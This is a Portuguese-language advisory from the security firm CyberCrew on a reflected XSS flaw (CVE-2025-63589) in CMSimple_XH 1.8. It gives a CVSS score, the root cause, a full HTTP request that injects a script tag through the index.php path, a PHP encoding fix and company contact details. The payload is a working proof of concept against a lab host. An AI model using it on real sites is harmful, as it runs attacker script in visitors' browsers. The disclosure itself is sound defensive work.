
Prova de conceito de XSS refletido para CMSimple_XH 1.8 com injeção de script não autenticada por meio de segmentos de caminho não sanitizados, incluindo pontuação CVSS 6.1 e exemplo de correção em PHP.
Descoberto: 6 de outubro de 2025
Produtos: CMSimple_XH (CMS de arquivo plano de código aberto)
Versões afetadas: 1.8
CVE(s): CVE-2025-63589
Autenticação necessária: Nenhuma (não autenticado)
Tipo de ataque: Cross-Site Scripting refletido (XSS)
CVSS v3.1 estimado: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Médio)
O front-controller em index.php aceita segmentos de caminho dinâmicos (usados para rotear para templates/páginas) e passa esses valores para a renderização de templates. O código não sanitiza nem codifica em HTML adequadamente esses segmentos de caminho antes de inseri-los em atributos e hrefs de âncoras. Como resultado, uma URI de requisição especialmente elaborada contendo caracteres como "> e tags injetadas (ex.: <script>...</script>) é refletida literalmente na saída HTML e executada pelo navegador.
Os pontos típicos de reflexão incluem:
action de formulários (ex.: formulários de login/pesquisa)href de itens de navegação/menu<nav class="locator">)Print view, Sitemap, Login, etc.)Como a entrada acaba em contextos de atributos HTML e no conteúdo de âncoras, a codificação padrão de atributos é necessária, mas está ausente.
Requisição:
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32
search=Search...&function=search
Resposta:
O payload injetado gjtqw"><script>alert(1)</script>co2cu é refletido sem codificação nos links de menu, breadcrumbs, action do formulário de pesquisa e links de rodapé, resultando na execução de script quando a página é renderizada.
$safe_segment = rawurlencode($segment); // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
HttpOnly)Se tiver perguntas ou consultas, sinta-se à vontade para entrar em contato conosco.
📞 Tel: 03-6853-5823
📧 Mail:[email protected]
| Item | Descrição |
|---|---|
| Nome da empresa | 株式会社CyberCrew |
| Endereço | 東京都千代田区外神田1-18-13 秋葉原ダイビル6階 |
Analisamos as vulnerabilidades da organização sob múltiplas perspectivas e propomos as melhores medidas de melhoria.
Atendemos desde testes direcionados e baseados em cenários até testes de penetração em LLM.
Detectamos precocemente o vazamento de informações confidenciais e respondemos rapidamente.
Realizamos avaliações da capacidade defensiva com base em cenários de ataque práticos.
Apoiamos o design com a segurança considerada desde os estágios iniciais do desenvolvimento.
🌐 Site oficial:https://www.cybercrew.co.jp
🕒 CyberCrew — Seu parceiro de segurança confiável.